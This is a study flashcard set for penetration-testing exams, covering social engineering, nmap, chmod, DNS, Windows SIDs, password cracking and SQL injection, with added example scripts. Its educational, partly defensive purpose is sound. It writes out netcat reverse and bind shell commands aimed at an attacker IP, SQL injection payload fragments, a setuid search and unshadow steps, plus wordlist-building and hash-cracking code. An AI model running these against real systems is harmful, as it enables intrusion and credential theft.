Full Test Flashcards

(52 cards)

1
Q

What does -sV mean in “nmap -sV 192.168.10.1 -p-”?

A

-sV = service/version detection. After the port scan, nmap sends probes to every open port to identify the service and its version (e.g. OpenSSH 8.9, Apache 2.4.x) instead of guessing from the port number alone.
-p- = scan all 65535 TCP ports rather than the default top 1000, so version detection runs against every open port that is found.

2
Q

Spear Phishing

A

Phishing aimed at a specific individual or organisation rather than sent in bulk, using details gathered about the target (name, role, colleagues, current projects) to make the lure convincing.

3
Q

Pretexting

A

Fabricates a scenario or pretext to steal their victims’ personal information

4
Q

Blackmail/ Intimidation

A

Utilising information/force to compel the victim

5
Q

Baiting

A

Enticing the victim with something they want (a free download, a "lost" USB drive, a prize) so that they reveal information or run something on the attacker's behalf.

6
Q

Tailgating/Piggybacking

A

Involves an unauthorized person following an authorized individual into a restricted area or system

7
Q

Vishing

A

Using phone calls to scam the victim into divulging information

8
Q

Smishing

A

Text messages to lure victims into clicking on a malicious link or providing personal information

9
Q

Impersonation

A

Pretending to be a trusted contact or authority

10
Q

Phases of social engineering

A

Investigation
Identifying the victim(s)
Gathering background information
Selecting attack method

Hook
Engaging the target
Spinning a story
Taking control of the interaction

Play
Expanding foothold
Executing the attack
Disrupting business and/or siphoning data

Exit
Removing all traces of malware
Covering tracks
Bringing the charade to a natural end

11
Q

Information Gathering

A

Examples:
Date of birth, anniversaries and family birthdays, which people reuse as 4- or 6-digit PINs
Compiling a targeted wordlist from the company website, social media profiles and public documents
Using other active information gathering methods

12
Q

Disadvantages of dictionary attacks

A

Uncertain – only succeeds if the password is actually in the list
Detection / blacklisting – repeated failed logins against a live service trigger lockouts, alerts or IP bans
Honeypot – decoy accounts or services exist precisely to catch guessing attempts

13
Q

Intelligent Guessing

A

Trying the most likely passwords first instead of the whole keyspace: vendor defaults (admin/admin), the company name plus a year, season+year, keyboard walks (qwerty123) and credentials from previous breaches.
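
The information-gathering and intelligent-guessing cards above describe the inputs; the script below is an added example (not part of the original flashcards) that turns them into a candidate list. The target profile, names and dates are constructed, and the rule set (case and leet variants, suffixes, date-derived PINs, name+year) is an assumption that mirrors what tools such as CUPP do.

```python
"""Targeted wordlist generation from gathered profile data (added example).

The profile below is constructed for illustration; the rules are a small
subset of what tools such as CUPP or hashcat rule files apply.
"""
from datetime import date
from itertools import product

# Constructed, hypothetical target profile (names and dates are invented).
PROFILE = {
    "names": ["Alice", "Smith"],
    "company": "Acme",
    "pet": "Rex",
    "dates": [date(1988, 3, 14), date(2015, 6, 2)],  # birthday, anniversary
}

# "Intelligent guessing" seeds: vendor defaults and perennial favourites.
DEFAULTS = ["admin", "password", "Password1", "welcome", "changeme"]
SUFFIXES = ["", "1", "123", "!", "2024", "2025"]
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def date_pins(d: date) -> set[str]:
    """4/6/8-digit PIN candidates from one date: DDMM, MMDD, YYYY, DDMMYY, ..."""
    dd, mm = f"{d.day:02d}", f"{d.month:02d}"
    yy, yyyy = f"{d.year % 100:02d}", f"{d.year}"
    return {dd + mm, mm + dd, yyyy, dd + mm + yy, mm + dd + yy,
            yy + mm + dd, dd + mm + yyyy, mm + dd + yyyy}


def base_words(profile: dict) -> set[str]:
    """Words taken directly from the profile."""
    return {w for w in [*profile["names"], profile["company"], profile["pet"]] if w}


def mutate(word: str) -> set[str]:
    """Case, leet-speak and suffix variations of one base word."""
    forms = {word, word.lower(), word.upper(), word.capitalize()}
    forms |= {f.translate(LEET) for f in list(forms)}
    return {f + s for f, s in product(forms, SUFFIXES)}


def build_wordlist(profile: dict, defaults=DEFAULTS, min_len: int = 4) -> list[str]:
    """De-duplicated candidate list, shortest (cheapest to try) first."""
    cands = set(defaults)
    for w in base_words(profile):
        cands |= mutate(w)
        for d in profile["dates"]:           # name + year combinations
            cands.add(f"{w}{d.year}")
            cands.add(f"{w.lower()}{d.year % 100:02d}")
    for d in profile["dates"]:
        cands |= date_pins(d)
    return sorted((c for c in cands if len(c) >= min_len), key=lambda c: (len(c), c))


if __name__ == "__main__":
    wordlist = build_wordlist(PROFILE)
    print(f"{len(wordlist)} candidates, e.g. {wordlist[:12]}")
```

The ordering by length matters for online guessing, where every attempt counts against a lockout threshold: the cheapest, most probable candidates go first and the list is cut off long before the rule expansion would be exhausted.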

14
Q

Deception (Honeypots)

A

Honeypots
- Honey Users
- Honey Tokens
- Honey Pots
- Honey Nets

Obfuscation

Switching port numbers, plugin names, directory names etc. This slows down automated scanners and mass exploitation but is security through obscurity, not a substitute for patching and hardening.

15
Q

Permission to Octal Conversion

A

| Symbol | Binary | Octal |
| ------ | ------ | ----- |
| ---    | 000    | 0     |
| --x    | 001    | 1     |
| -w-    | 010    | 2     |
| -wx    | 011    | 3     |
| r--    | 100    | 4     |
| r-x    | 101    | 5     |
| rw-    | 110    | 6     |
| rwx    | 111    | 7     |

[File Type] [Owner] [Group] [Others]
- rwx r-x r--

The first character is the file type:

- = regular file

d = directory

l = symbolic link

The remaining 9 characters are permissions, in three groups of three:

First 3 = Owner

Next 3 = Group

Last 3 = Others

r = read

w = write

x = execute

- = no permission

Read each group of three as a binary number and write its octal digit: rwx r-x r-- = 7 5 4, i.e. chmod 754.

16
Q

What is “salting” in password security?

A

Salting is the process of adding a random string (salt) to a password before hashing it, to make each hash unique — even if users have the same password.
This helps defend against rainbow table and precomputed hash attacks.

17
Q

How do you identify a reverse shell (or bind shell) connection using nc (Netcat), and which side is the victim?

A

Look at which side listens and which side runs -e (execute a program and wire it to the socket):

Bind shell: the target listens and hands out the shell.
target:   nc -l -p 4444 -e /bin/bash
attacker: nc [target IP] 4444
→ The listener is hosting a shell; whoever connects gets it.

Reverse shell: the target connects out to the attacker's listener and hands out the shell.
attacker: nc -l -p 4444
target:   nc [attacker IP] 4444 -e /bin/bash
→ The listener receives a shell from the machine that connected.

💡 Rule of Thumb (holds for both):

Machine that runs -e /bin/bash (or -e cmd.exe) = gives away control (victim)

Other end of that connection = gains control (attacker)

Caveat: -e exists in traditional netcat and in ncat (--exec), but not in the OpenBSD nc shipped by many Linux distributions; there the same effect is achieved with a named pipe (mkfifo) feeding /bin/sh.
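
As an added example (not part of the original card), the detection logic below applies the rule of thumb to process-creation events: whichever netcat invocation carries -e/--exec is the side giving away a shell, and the presence of -l decides whether that is a bind or a reverse shell. The log format and the events are constructed, and the flag handling covers traditional netcat and ncat only.

```python
"""Spot bind- and reverse-shell netcat invocations in process-creation logs (added example).

The log lines are constructed; in practice they would come from auditd,
Sysmon or an EDR.  Only the -e / --exec / --sh-exec forms are recognised; the
mkfifo trick used with OpenBSD nc needs a separate rule.
"""
import re
import shlex

NC_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"-e", "--exec", "--sh-exec"}
LOG_RE = re.compile(r"pid=(?P<pid>\d+) user=(?P<user>\S+) cmd=(?P<cmd>.*)")

# Constructed sample events (hypothetical hosts and ports).
SAMPLE_LOG = [
    "pid=4021 user=www-data cmd=nc -e /bin/bash 10.0.0.5 4444",
    "pid=4022 user=root cmd=nc -lvnp 4444",
    "pid=4023 user=alice cmd=nc -l -p 5555 -e /bin/sh",
    "pid=4024 user=bob cmd=nc 10.0.0.5 5555",
    "pid=4025 user=svc cmd=ncat -l 9001 --exec /bin/bash",
    "pid=4026 user=svc cmd=nc -zv 10.0.0.5 22",
    "pid=4027 user=svc cmd=ls -la /tmp",
]


def classify_nc(cmdline: str) -> dict:
    """Derive the role of one netcat command line from its flags.

    listens  : -l present, also inside clusters such as -lvnp or -nlvp
    program  : argument of -e/--exec/--sh-exec, i.e. what is wired to the socket
    role     : bind_shell_host      listens and executes  -> victim
               reverse_shell_sender connects and executes -> victim
               listener             listens, no exec      -> attacker catching a reverse shell
               client               connects, no exec     -> attacker reaching a bind shell, or a port probe
    """
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_BINARIES:
        return {"role": "not_nc", "program": None, "listens": False}
    listens, program = False, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in EXEC_FLAGS:
            program = argv[i + 1] if i + 1 < len(argv) else None
            i += 1
        elif arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]:
            listens = True
        i += 1
    if program is not None:
        role = "bind_shell_host" if listens else "reverse_shell_sender"
    else:
        role = "listener" if listens else "client"
    return {"role": role, "program": program, "listens": listens}


def shell_givers(log_lines) -> list:
    """Events where the local machine hands a program to the network, i.e. the victim side."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        info = classify_nc(m["cmd"])
        if info["program"] is not None:
            hits.append({"pid": m["pid"], "user": m["user"], **info})
    return hits


if __name__ == "__main__":
    for hit in shell_givers(SAMPLE_LOG):
        print(f"pid={hit['pid']} user={hit['user']} {hit['role']} program={hit['program']}")
```

A plain listener or client is not flagged on its own: nc -lvnp 4444 is how an attacker catches a reverse shell, but it is also how an administrator tests a firewall rule, so the exec flag is the discriminating signal.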

18
Q

Forward DNS lookup from a reverse DNS lookup?

A

Forward DNS Lookup:
🔎 Converts a domain name (e.g., example.com) → IP address (93.184.216.34)
✔️ Most common type of DNS query.

Reverse DNS Lookup:
🔁 Converts an IP address → domain name
🔍 Uses PTR (pointer) records in DNS.

🧠 Remember:

Forward = Name → IP

Reverse = IP → Name
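
The reverse-lookup name is built by reversing the address under a fixed suffix. The following Python is an added example (not from the original flashcards) that builds and inverts PTR owner names for both IPv4 and IPv6, which is where the expansion of :: and the one-nibble-per-label layout usually trip people up; on a real resolver the same name is what dig -x <ip> queries. The example.com address is the one given in the card.

```python
"""Build and invert reverse-DNS (PTR) query names (added example).

Pure string manipulation, no network; ipaddress is used only to validate and
normalise addresses.
"""
import ipaddress


def ptr_name(ip: str) -> str:
    """Owner name of the PTR record for an IPv4 or IPv6 address.

    IPv4: the four octets reversed, under in-addr.arpa.
    IPv6: the 32 hex nibbles of the fully expanded address reversed, one per
    label, under ip6.arpa (so a compressed '::' must be expanded first).
    """
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        return ".".join(reversed(addr.exploded.split("."))) + ".in-addr.arpa"
    nibbles = addr.exploded.replace(":", "")       # 32 hex digits, zeros kept
    return ".".join(reversed(nibbles)) + ".ip6.arpa"


def ip_from_ptr(name: str) -> str:
    """Inverse of ptr_name: recover the address from a PTR owner name."""
    name = name.rstrip(".").lower()
    if name.endswith(".in-addr.arpa"):
        labels = name[: -len(".in-addr.arpa")].split(".")
        if len(labels) != 4:
            raise ValueError("need exactly four labels for a host PTR")
        return str(ipaddress.IPv4Address(".".join(reversed(labels))))
    if name.endswith(".ip6.arpa"):
        nibbles = name[: -len(".ip6.arpa")].split(".")
        if len(nibbles) != 32 or any(len(n) != 1 for n in nibbles):
            raise ValueError("need exactly 32 single-hex-digit labels")
        return str(ipaddress.IPv6Address(int("".join(reversed(nibbles)), 16)))
    raise ValueError("not a reverse-DNS name")


if __name__ == "__main__":
    for ip in ("93.184.216.34", "2001:db8::1"):
        name = ptr_name(ip)
        print(f"{ip:>16} -> {name}")
        print(f"{'':>16} <- {ip_from_ptr(name)}")
```

A PTR answer is controlled by whoever owns the address block, not by the domain owner, so a reverse lookup on its own proves nothing about identity; forward-confirmed reverse DNS (resolve the PTR result forward again and check the original IP is among the answers) is the usual check.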

19
Q

Which tools can be used for offline cracking of password hashes?

A

🛠️ Common tools for offline hash cracking:

✅ John the Ripper – Fast and flexible password cracker (CPU-based, hundreds of hash formats; ships with unshadow).

✅ Hashcat – GPU-accelerated hash cracking tool.

✅ Cain & Abel – Windows-only legacy tool (LM/NTLM and others).

❌ Hydra – Not an offline cracker: it brute-forces live login services over the network (SSH, FTP, HTTP forms), so it belongs to online attacks.

📌 Offline cracking means:

You already have the password hashes (e.g., from /etc/shadow, the Windows SAM, or a database dump).

You're not interacting with a live login service, so there is no lockout, rate limit or alert per attempt; speed is bounded only by your hardware and the hash function's cost.

Dictionary, rule-based, mask and brute-force attacks are run locally.
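
An added example (not from the original flashcards) of what "offline" means in practice: a small dictionary-plus-rules attack over a constructed hash dump in a legacy user:sha1hex format, the kind an old web application database might leak. The user names, passwords and wordlist are invented. It is not an /etc/shadow cracker; shadow entries are salted crypt formats that John the Ripper or hashcat handle.

```python
"""Offline dictionary + rule attack against a hash dump (added example).

The dump is constructed in memory in a legacy "user:sha1hex" format with
unsalted SHA-1.  It is NOT /etc/shadow: shadow entries are salted
sha512crypt/yescrypt hashes and are cracked with John the Ripper or hashcat.
"""
import hashlib
from typing import Iterable, Iterator


def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


# Constructed hash dump; the plaintexts appear here only to build the sample.
DUMP = {
    "alice": sha1_hex("Summer2023"),
    "bob":   sha1_hex("letmein"),
    "carol": sha1_hex("Tr0ub4dor&3"),   # not derivable from the wordlist: stays uncracked
    "dave":  sha1_hex("letmein"),       # same password as bob -> same unsalted hash
}
WORDLIST = ["password", "letmein", "summer", "winter", "acme"]


def candidates(words: Iterable[str]) -> Iterator[str]:
    """Rule-based expansion: case variants, year and common suffixes."""
    for word in words:
        for base in (word, word.capitalize(), word.upper()):
            yield base
            for year in range(2019, 2026):
                yield f"{base}{year}"
            for suffix in ("1", "123", "!"):
                yield base + suffix


def crack(dump: dict, words: Iterable[str], algo: str = "sha1"):
    """Return ({user: password}, attempts).

    Offline advantage: each candidate is hashed once and looked up against all
    targets at the same time, with no lockout or rate limit in the way.  With
    unsalted hashes, cracking one user cracks everyone sharing that password.
    """
    by_hash = {}
    for user, h in dump.items():
        by_hash.setdefault(h, []).append(user)
    found, attempts = {}, 0
    for cand in candidates(words):
        attempts += 1
        h = hashlib.new(algo, cand.encode("utf-8")).hexdigest()
        for user in by_hash.pop(h, []):
            found[user] = cand
        if not by_hash:
            break
    return found, attempts


if __name__ == "__main__":
    found, attempts = crack(DUMP, WORDLIST)
    print(f"{attempts} candidates tried, {len(found)}/{len(DUMP)} cracked: {found}")
```

Compare this with the salted-hash card: with a per-user salt the by_hash shortcut disappears, because every user needs their own hash computation per candidate, and a slow KDF multiplies that cost again.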

20
Q

Common DNS Record Types

A

A = Address Record: maps a name to an IPv4 address
AAAA = IPv6 Address Record: maps a name to an IPv6 address
CNAME = Canonical Name Record: makes one name an alias of another
MX = Mail Exchange Record: mail servers for the domain, with priorities
PTR = Pointer Record: reverse mapping (IP → name) under in-addr.arpa / ip6.arpa
NS = Name Server Record: authoritative servers for the zone
SOA = Start of Authority Record: zone metadata (primary server, admin contact, serial number, refresh/retry/expire timers)
TXT = Text Record: free text; carries SPF, DKIM and DMARC policies and domain-ownership verification tokens
SRV = Service Record: host and port for a named service (e.g. _ldap._tcp)
SPF = Sender Policy Framework: the policy listing hosts allowed to send mail for the domain; published in a TXT record (the dedicated SPF record type is deprecated by RFC 7208)
CAA = Certification Authority Authorization: which CAs may issue certificates for the domain

21
Q

What are valid defences to buffer overflow attacks?

A

Stack canaries (stack guards): Random values placed between local buffers and the saved return address; a changed canary at function return signals a stack overwrite and the process aborts instead of returning to attacker-controlled code.

Address Space Layout Randomization (ASLR): Randomizes memory addresses to make exploitation harder.

Data Execution Prevention (DEP) / NX bit: Marks memory regions as non-executable to prevent code injection.

Bounds checking / Safe programming languages: Using languages or techniques that prevent buffer overflows.

Control Flow Integrity (CFI): Ensures program control flow follows valid paths only.

22
Q

Network Scanning & Reconnaissance

A

Nmap – Network mapper, port scanner, OS fingerprinting

Masscan – Very fast port scanner

Netdiscover – Network address discovery

Angry IP Scanner – Simple network scanner

23
Q

Packet Capture & Analysis tools

A

Wireshark – Network protocol analyzer (packet sniffer)

Tcpdump – Command-line packet analyzer

24
Q

Exploitation Frameworks

A

Metasploit Framework – Exploit development and execution platform

BeEF – Browser Exploitation Framework

25
Q

Password Cracking

A

John the Ripper – Password hash cracker

Hashcat – GPU-accelerated password cracker

Hydra – Online password brute force tool (attacks live login services, not hashes)

26
Q

Network Communication & Tunneling

A

Netcat (nc) – Network utility for reading/writing data across networks

Socat – More advanced version of Netcat for bidirectional data transfer

OpenVPN – VPN tunneling tool

27
Q

Vulnerability Scanning

A

Nessus – Vulnerability scanner

OpenVAS – Open-source vulnerability scanner

28
Q

Web Application Testing

A

Burp Suite – Web application security testing

OWASP ZAP – Open Web Application Security Project scanner

29
Q

Wireless Security

A

Aircrack-ng – Wireless network auditing suite

Kismet – Wireless network detector and sniffer

30
Q

How to interpret a Windows SID (Security Identifier)?

A

A domain or local account SID looks like this:

S-1-5-21-<sub1>-<sub2>-<sub3>-<RID>

S — SID prefix
1 — Revision level
5 — Identifier Authority (5 = NT Authority)
21-<sub1>-<sub2>-<sub3> — Domain or local computer identifier (sub-authorities); every account in the same domain or machine shares this part
RID (Relative Identifier) — The last number; identifies the specific user or group within that domain/computer

Common RID values and meanings:

| RID   | Account                                      |
| ----- | -------------------------------------------- |
| 500   | Built-in Administrator                       |
| 501   | Guest account                                |
| 502   | krbtgt (domain Kerberos service account)     |
| 512   | Domain Admins                                |
| 513   | Domain Users                                 |
| 1000+ | User and group accounts created after setup  |

Tip: The last number in the SID is always the RID, which identifies the specific account. The identifier authority is the number after the revision (5 in most Windows SIDs). The sub-authorities identify the domain or machine scope, so two SIDs with the same S-1-5-21-... prefix belong to the same domain; fixed SIDs such as S-1-5-32-544 (BUILTIN\Administrators) and S-1-1-0 (Everyone) are the same on every system.

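
The Python below is an added example (not part of the original flashcard) that parses a SID string into its parts and names the well-known RIDs and fixed SIDs; the domain identifier used in the demo is a made-up value, while the RID and well-known SID meanings are the standard Windows ones.

```python
"""Parse and interpret Windows SID strings (added example).

String form only (the binary form found in tokens and ACLs is not covered).
The domain identifier used in the demo is an arbitrary, constructed value.
"""
import re

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")
AUTHORITIES = {0: "Null", 1: "World", 2: "Local", 3: "Creator", 5: "NT Authority"}
DOMAIN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers",
    518: "Schema Admins", 519: "Enterprise Admins",
}
WELL_KNOWN = {           # fixed SIDs that are identical on every system
    "S-1-1-0": "Everyone", "S-1-5-18": "Local System",
    "S-1-5-32-544": "BUILTIN\\Administrators", "S-1-5-32-545": "BUILTIN\\Users",
}


def parse_sid(sid: str) -> dict:
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(x) for x in m.group(3).strip("-").split("-")]
    info = {
        "revision": revision,
        "authority": authority,
        "authority_name": AUTHORITIES.get(authority, "unknown"),
        "sub_authorities": subs,
        "rid": subs[-1],                # the last component is always the RID
        "domain_sid": None,
        "name": WELL_KNOWN.get(sid),
    }
    # S-1-5-21-<a>-<b>-<c>-<RID>: an account in a domain or on a local machine
    if authority == 5 and subs[0] == 21 and len(subs) == 5:
        info["domain_sid"] = "S-1-5-21-" + "-".join(map(str, subs[1:4]))
        rid = subs[4]
        if rid in DOMAIN_RIDS:
            info["name"] = DOMAIN_RIDS[rid]
        elif rid >= 1000:
            info["name"] = "account created after setup (RID >= 1000)"
        else:
            info["name"] = "reserved well-known RID"
    return info


def same_domain(sid_a: str, sid_b: str) -> bool:
    """True when both SIDs share the S-1-5-21-... domain identifier."""
    a, b = parse_sid(sid_a)["domain_sid"], parse_sid(sid_b)["domain_sid"]
    return a is not None and a == b


if __name__ == "__main__":
    # Constructed domain identifier; the RIDs are the real well-known values.
    domain = "S-1-5-21-1111111111-2222222222-3333333333"
    for sid in (f"{domain}-500", f"{domain}-512", f"{domain}-1105", "S-1-5-32-544", "S-1-1-0"):
        p = parse_sid(sid)
        print(f"{sid:<50} RID={p['rid']:<5} {p['name']}")
```

The RID, not the account name, is what access checks use: renaming the built-in Administrator account does not change its RID of 500, which is why enumeration tools look for that RID rather than the name.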
31
Q

What is privilege escalation, and what are the differences between horizontal and vertical privilege escalation?

A

Privilege Escalation is the act of exploiting a bug, design flaw, or configuration oversight to gain elevated access to resources that are normally protected.

Types of Privilege Escalation:

Horizontal Privilege Escalation: Accessing resources or actions of another user at the same privilege level (e.g., accessing another user's files or account).

Vertical Privilege Escalation: Gaining higher privileges than originally granted, such as a regular user obtaining administrator or root access.

Remember:
Horizontal = same level, different user
Vertical = higher level than you started with

32
Q

sudo find / -name <filename>

A

sudo — Run the command with superuser (root) privileges so that directories the current user cannot read are searched too.

find / — Search starting from the root directory (/) through the entire filesystem.

-name <filename> — Match files with that exact name (case-sensitive; -iname matches case-insensitively).

Without sudo, append 2>/dev/null to discard the "Permission denied" messages from directories you cannot enter.

33
Q

Which of the following commands is used to view the manual information of a command in Linux?

A

man

man stands for manual. It displays the user manual/help pages for commands, programs, or system calls.

34
Q

What tools are helpful for scanning or indexing web server directories?

A

Common tools include:

Dirb — Brute force scanner to find hidden directories/files.

Dirbuster — GUI tool for brute forcing directories and files on web servers.

Gobuster — Fast directory/file brute forcer written in Go.

Nikto — Web server scanner that also finds directories and vulnerabilities.

WFuzz — Web application brute forcer for directories and parameters.

35
Q

Which of the following is a possible outcome of the Linux command below? echo $SHELL

A

/bin/bash

$SHELL holds the user's login shell as recorded in /etc/passwd; it is not necessarily the shell currently running (check that with echo $0 or ps -p $$).

36
Q

What are common security testing techniques used in ethical hacking and app testing?

A

Fuzzing = Sending malformed or random data to applications to find crashes or vulnerabilities.

Brute Forcing = Repeatedly trying many inputs (like passwords or directories) to gain access or uncover hidden data.

Penetration Testing = Simulating real-world attacks to discover and exploit security flaws.

Input Validation Testing = Supplying unexpected or malicious input to test how well the application handles it.

Static Code Analysis = Reviewing source code without executing it to detect security issues or bugs.

Dynamic Analysis = Observing the behavior of an application during runtime to identify vulnerabilities.

Vulnerability Scanning = Using automated tools to detect known security weaknesses in systems or applications.

Directory/Resource Enumeration = Discovering exposed directories or files on a web server.

Social Engineering = Manipulating people into revealing confidential information or performing actions that compromise security.

37
Q

chmod Octal Permission Cheat Sheet

A

Basic Octal Values (one digit each for owner, group, others):
7 = rwx → read, write, execute
6 = rw- → read, write
5 = r-x → read, execute
4 = r-- → read only
3 = -wx → write, execute
2 = -w- → write only
1 = --x → execute only
0 = --- → no permissions

Special Permission Bits (optional 1st digit before the usual 3):
4 = Setuid → the file runs with the file owner's privileges (shown as s in the owner's execute column)
2 = Setgid → the file runs with the file group's privileges; on a directory, new files inherit the directory's group (s in the group's execute column)
1 = Sticky Bit → in a world-writable directory, only a file's owner, the directory owner or root can delete/rename it (t in the others' execute column)

An uppercase S or T means the special bit is set but the corresponding execute bit is not.

Examples:
chmod 4755 file → Setuid + rwxr-xr-x → rwsr-xr-x
chmod 2755 file → Setgid + rwxr-xr-x → rwxr-sr-x
chmod 1777 /tmp → Sticky bit + full access → rwxrwxrwt
chmod 6777 file → Setuid + Setgid + rwxrwxrwx → rwsrwsrwx

Setuid-root binaries are a classic privilege escalation target; find / -perm -4000 -type f 2>/dev/null lists them.

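
The conversion in the permission-to-octal card (15) and in this cheat sheet can be done mechanically. The following Python is an added example (not from the original flashcards) that converts ls -l mode strings to chmod octal and back, handling the s/S and t/T special-bit markers, and cross-checks itself against the standard library's stat.filemode.

```python
"""Convert between ls-style mode strings and chmod octal, special bits included (added example).

Serves both the permission-to-octal card and the chmod cheat sheet; the
stdlib's stat.filemode is used only to cross-check the result.
"""
import stat


def mode_string_to_octal(mode: str) -> str:
    """'-rwsr-xr-x' -> '4755', 'drwxrwxrwt' -> '1777', 'rwxr-xr--' -> '0754'."""
    if len(mode) == 10:          # leading file-type character from ls -l
        mode = mode[1:]
    if len(mode) != 9:
        raise ValueError("expected 9 permission characters")
    special = perms = 0
    for i, ch in enumerate(mode):
        bit = 1 << (8 - i)      # owner rwx = 0o400 0o200 0o100, group ..., others ...
        if ch == "-":
            continue
        if ch == "rwx"[i % 3]:
            perms |= bit
        elif ch in "sS" and i in (2, 5):         # setuid (owner x) / setgid (group x)
            special |= 4 if i == 2 else 2
            if ch == "s":                        # lowercase: execute bit also set
                perms |= bit
        elif ch in "tT" and i == 8:              # sticky bit (others x)
            special |= 1
            if ch == "t":
                perms |= bit
        else:
            raise ValueError(f"unexpected {ch!r} at position {i}")
    return f"{special}{perms:03o}"


def octal_to_mode_string(octal: str, file_type: str = "-") -> str:
    """'4755' -> '-rwsr-xr-x'; 3-digit input means no special bits."""
    value = int(octal, 8)
    special, perms = value >> 9, value & 0o777
    chars = ["rwx"[i % 3] if perms & (1 << (8 - i)) else "-" for i in range(9)]
    if special & 4:
        chars[2] = "s" if chars[2] == "x" else "S"
    if special & 2:
        chars[5] = "s" if chars[5] == "x" else "S"
    if special & 1:
        chars[8] = "t" if chars[8] == "x" else "T"
    return file_type + "".join(chars)


def is_setuid_or_setgid(mode: str) -> bool:
    """Quick triage: does this ls -l mode carry a setuid or setgid bit?"""
    return int(mode_string_to_octal(mode)[0]) & 0o6 != 0


if __name__ == "__main__":
    for octal in ("754", "4755", "2755", "1777", "6777", "4644"):
        shown = octal_to_mode_string(octal, "d" if octal == "1777" else "-")
        print(f"chmod {octal:<5} -> {shown} -> {mode_string_to_octal(shown)}")
```

Feeding the output of ls -l through is_setuid_or_setgid is the same check that find -perm -4000 or -perm -2000 performs, which is useful when you only have a directory listing from a target and not shell access.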
38
Q

When attempting to crack user passwords in Linux, which of the files below do you need to "unshadow"?

A

/etc/passwd and /etc/shadow

unshadow (shipped with John the Ripper) merges the account details in /etc/passwd with the password hashes in /etc/shadow into one file John can work on; reading /etc/shadow requires root.

39
Q

HTTP Status Codes Cheat Sheet

A

1xx – Informational
100 Continue: The initial part of a request has been received and the client should continue.
101 Switching Protocols: Server is switching protocols as requested by client.

2xx – Success
200 OK: Request succeeded and response contains requested data.
201 Created: Resource successfully created.
204 No Content: Request succeeded but no content to return.

3xx – Redirection
301 Moved Permanently: Resource has permanently moved to a new URL.
302 Found: Temporary redirect to a different URL.
304 Not Modified: Resource has not changed since last request.

4xx – Client Errors
400 Bad Request: The server could not understand the request due to invalid syntax.
401 Unauthorized: Authentication is required and has failed or not been provided.
403 Forbidden: Server understands the request but refuses to authorize it.
404 Not Found: Requested resource could not be found.
405 Method Not Allowed: Request method is not supported for the resource.

5xx – Server Errors
500 Internal Server Error: Generic server error, unable to fulfill the request.
501 Not Implemented: Server does not support the functionality required.
502 Bad Gateway: Invalid response from an upstream server.
503 Service Unavailable: Server is currently unavailable (overloaded or down).
504 Gateway Timeout: Server did not receive a timely response from an upstream server.

40
Q

What is the specific purpose of the command below? objdump -d PasswordChecker

A

Disassemble the executable sections of the PasswordChecker binary (-d = disassemble), printing each instruction with its address and opcode bytes, so the password-checking logic can be read without the source code.

41
Q

SQL Injection Types Cheat Card

A

Classic Union-based SQL Injection
Uses the UNION operator to combine the results of the original query with attacker-controlled queries. Example: Appending UNION SELECT to extract data from other tables (column count and types must match the original SELECT).

Time-based Blind SQL Injection
Exploits delays in the database response to infer true/false conditions. Sends queries that cause the database to pause (e.g., WAITFOR DELAY '00:00:05' on SQL Server, SLEEP(5) on MySQL). Useful when no output or errors are shown.

Error-based SQL Injection
Triggers database errors to reveal information about the database structure. Malformed SQL causes error messages that leak table names, columns, etc.

Benchmark SQL Injection
Similar to time-based but uses database benchmarking functions to cause delays. Uses functions like BENCHMARK() (in MySQL) to perform heavy computations repeatedly, indicating true/false conditions.

Boolean-based SQL Injection
Sends queries that evaluate to true or false and observes differences in app behavior or content. Example: Adding AND 1=1 (true) vs. AND 1=2 (false) to see if the response changes.

42
Q

Which of the following options can be used to start a local shell in an existing Meterpreter session?

A

shell

43
Q

Preventing Sensitive Data Exposure

A

Effective Methods to Prevent Sensitive Data Exposure:

Encryption – Encrypt sensitive data both at rest (in databases, storage) and in transit (using TLS/SSL).

Access Controls – Implement strict authentication and authorization to limit who can view or modify sensitive data.

Data Masking & Redaction – Hide or mask sensitive information in logs, UI, or error messages to avoid accidental leaks.

Secure Coding Practices – Validate and sanitize inputs to prevent injection attacks that could expose data.

Use of Secure Protocols – Always use secure communication protocols like HTTPS, SFTP, etc.

Regular Audits & Monitoring – Monitor access logs and perform security audits to detect unauthorized access early.

Avoid Sensitive Data in URLs or Logs – Never include secrets (passwords, tokens) in URLs or application logs.

44
Q

What Google dork can you use to find a spreadsheet titled “Default password for RJ45”?

A

intitle:"Default password for RJ45" filetype:xls OR filetype:xlsx OR filetype:csv OR filetype:ods

Explanation:
intitle:"..." searches for the exact phrase in the page title.
filetype: limits search to spreadsheet files like Excel (xls, xlsx), CSV, or OpenDocument Spreadsheet (ods).

45
Q

Which commands can be used to search for files in Linux?

A

find — Search files and directories by name, type, size, date, permissions, etc.

locate — Quickly find files by name using a pre-built database.

grep — Search inside files for matching text patterns (not file names).

which — Find the full path of a command/executable in your PATH.

whereis — Locate source, binary, and manual files for a command.

readlink — Shows the target of a symbolic link (not really a search, but useful).

Note: find and locate are the primary commands for searching files by name or attributes.

46
Q

Items relating to Shells and Payloads

A

Reverse Shell → The target initiates a connection out to the attacker's IP address:port (target connects to attacker); works through NAT and outbound-only firewalls.

Bind Shell → Listens on a port on the target and accepts incoming connections (attacker connects to target); needs an inbound path to the target.

Payload → Code that runs on the target after successful exploitation.

Meterpreter → Metasploit's in-memory payload, delivered staged or stageless, which loads itself with reflective DLL injection rather than writing to disk.

msfvenom → Metasploit tool used to generate and encode payloads.

47
Q

What is an effective way to mitigate SQL injection attacks in web applications?

A

Use Prepared Statements (Parameterized Queries) – Separates SQL code from data, preventing attackers from injecting malicious SQL. This is the primary defence.

Input Validation and Sanitization – Validate and sanitize all user inputs to block malicious characters (defence in depth, not a replacement for parameterization).

